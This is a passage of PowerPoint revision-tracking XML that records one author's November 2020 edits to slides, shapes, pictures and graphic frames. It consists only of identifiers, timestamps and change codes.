          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:24.538" v="11006" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173228883" sldId="380"/>
            <ac:spMk id="3" creationId="{CFEA4607-FE9F-487B-A05E-5E3CDEAACDDA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15T22:05:07.897" v="7208" actId="1076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15T22:05:07.897" v="7208" actId="1076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 modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:49:05.601" v="11245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Anim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:36.154" v="9119" actId="1076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21T21:09:32.599" v="9118" actId="1076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21T21:09:36.154" v="9119" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731421883" sldId="383"/>
            <ac:picMk id="3" creationId="{3466217A-C3E2-44CB-8622-08459457D6FD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:26.324" v="9117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del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:56:18.033" v="9088" actId="47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modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-24T07:37:05.108" v="11270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24T07:37:05.108" v="11270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21T21:10:37.111" v="9133" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334360895" sldId="386"/>
            <ac:spMk id="3" creationId="{B8CE49D1-00A0-443D-BE62-56F93D3B93CF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:17:59.622" v="7856" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="703676086" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-14T22:08:12.240" v="5875" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="703676086" sldId="387"/>
            <ac:spMk id="3" creationId="{B6ACF78B-DE49-4DF3-89B3-1E4DDBE37CF7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:30.215" v="11267" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1023509386" sldId="426"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:48:40.855" v="5891" actId="14100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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:54:35.075" v="10116"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="518" creationId="{977DAE93-9189-4111-817E-CB83B361DF7F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:48:44.606" v="5892" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="740" creationId="{561EC690-BEDA-4738-BD12-E80FA70B402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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-19T18:29:01.417" v="7918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21:17:04.853" v="10238" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2867637286" sldId="429"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T21:17:04.853" v="10238" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2867637286" sldId="429"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp 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657153685" sldId="430"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:08:45.821" v="6226" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="657153685" sldId="430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19T18:29:33.627" v="7937" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="657153685" sldId="430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1371440257" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:16:43.880" v="10714"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3767213243" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:37:35.429" v="6879" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431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33:42.494" v="6795" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431"/>
            <ac:picMk id="4" creationId="{FC9C35D2-9660-453C-9CF0-5260888DFE97}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:33:45.752" v="6796" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:37:44.839" v="6880" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3869908966" sldId="432"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:29:30.851" v="6714" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432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29:42" v="6715" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432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29:42.867" v="6716" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:09:08.314" v="10713" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="827526027" sldId="433"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:09:08.314" v="10713" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433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1:09.547" v="6725" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433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1:10.304" v="6726" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:35:37.444" v="6808" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1185923952" sldId="434"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:34:34.350" v="6804" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:34:30.942" v="6802" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434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4:31.731" v="6803" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434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35:37.444" v="6808" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434"/>
            <ac:picMk id="7" creationId="{657C5054-3319-4342-960A-5E442E8FFBB3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:03.334" v="10716"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3855353301" sldId="435"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:21:18.905" v="8368" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:41:01.569" v="7030"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:spMk id="8" creationId="{583285F9-C09A-4480-A78E-F88CCE0BD5F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:38:46.937" v="6885" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:picMk id="4" creationId="{FC9C35D2-9660-453C-9CF0-5260888DFE97}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:38:47.878" v="6886" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:40:47.848" v="7016" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:picMk id="7" creationId="{B9558635-1FC0-4AEE-B36C-C163AB063448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1-22T22:17:20.498" v="10719"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4137273230" sldId="436"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:14.713" v="10718" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:43:00.343" v="7044" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="4" creationId="{FC03E69F-0CD0-4974-A335-E7A63ACD1364}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:43:20.071" v="7047" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="6" creationId="{66153FDF-BFA0-409B-8F6E-B3E74078F8F5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:42:18.505" v="7039" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="7" creationId="{B9558635-1FC0-4AEE-B36C-C163AB063448}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:44:54.767" v="9087" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1501548171" sldId="437"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:03:08.562" v="7121" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1501548171" sldId="437"/>
            <ac:spMk id="2" creationId="{96FCEEE1-F38E-4E12-9A3F-10F04935E0CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:03:31.994" v="7201" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1501548171" sldId="437"/>
            <ac:spMk id="3" creationId="{5C4AA90A-EC7D-4FC9-A7DA-22B665AFD91E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:37.621" v="9094" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2648658250" sldId="438"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:14:39.055" v="7827" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:graphicFrameMk id="2" creationId="{4C735EA8-4C70-48F2-85E9-C6AC783C6630}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:37.621" v="9094" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:16:11.921" v="7847" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:picMk id="3" creationId="{01A8D313-C60B-4143-8B57-C5D10D2B4679}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:16:07.597" v="7846" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:picMk id="4" creationId="{D3F49674-7759-4D2E-B296-D829C1E4C6B6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:46:40.816" v="10115" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="515666287" sldId="439"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:18:20.502" v="7876" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="515666287" sldId="439"/>
            <ac:spMk id="2" creationId="{B1541BCC-CC7D-4C5E-B54E-448F9F665217}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:18:15.893" v="7858" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="515666287" sldId="439"/>
            <ac:spMk id="3" creationId="{022B1FC8-5306-45F1-A36E-129F877B4798}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.501" v="11263" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="451106316" sldId="440"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:37:12.363" v="7944" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="451106316" sldId="440"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:50:47.250" v="8087" actId="164"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="283222430" sldId="441"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:42:54.753" v="7984" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="162" creationId="{56DE9CAD-A77E-4E81-B414-B874F9C12F0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:49:20.677" v="8082" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="163" creationId="{AB2A75D5-E2E1-4848-B9B1-296933BD18BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:48:15.093" v="8073" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="165" creationId="{7C6C7B88-86B7-44C3-954C-2D94B3F17D7E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:43:58.233" v="7997"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="4" creationId="{5D7AEFA4-462D-4196-9C77-60478A86F818}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:28.697" v="8008"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="14" creationId="{0B350746-E3C4-4C01-B43C-50E6ECE8950F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:38.377" v="8019"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="18" creationId="{68C90463-E20A-41C2-8A6B-B026714582B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2" creationId="{09A69FD5-C9BA-478D-99A3-681992EBA07A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27" creationId="{E7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.896" v="8046"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="55" creationId="{BB655C1C-D413-4D95-B6EA-DD2A5B9A9324}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.193" v="8043"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="58" creationId="{4230929A-7E9E-4568-83BD-D4D692D03677}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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81" creationId="{BFAB586D-72EF-470E-A89D-91EC7E4C022C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1-21T17:50:47.250" v="8087" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="99" creationId="{92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:42:03.998" v="7961" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:picMk id="161" creationId="{650E71EB-FD4C-4EE0-943A-FB4FB1782AE7}"/>
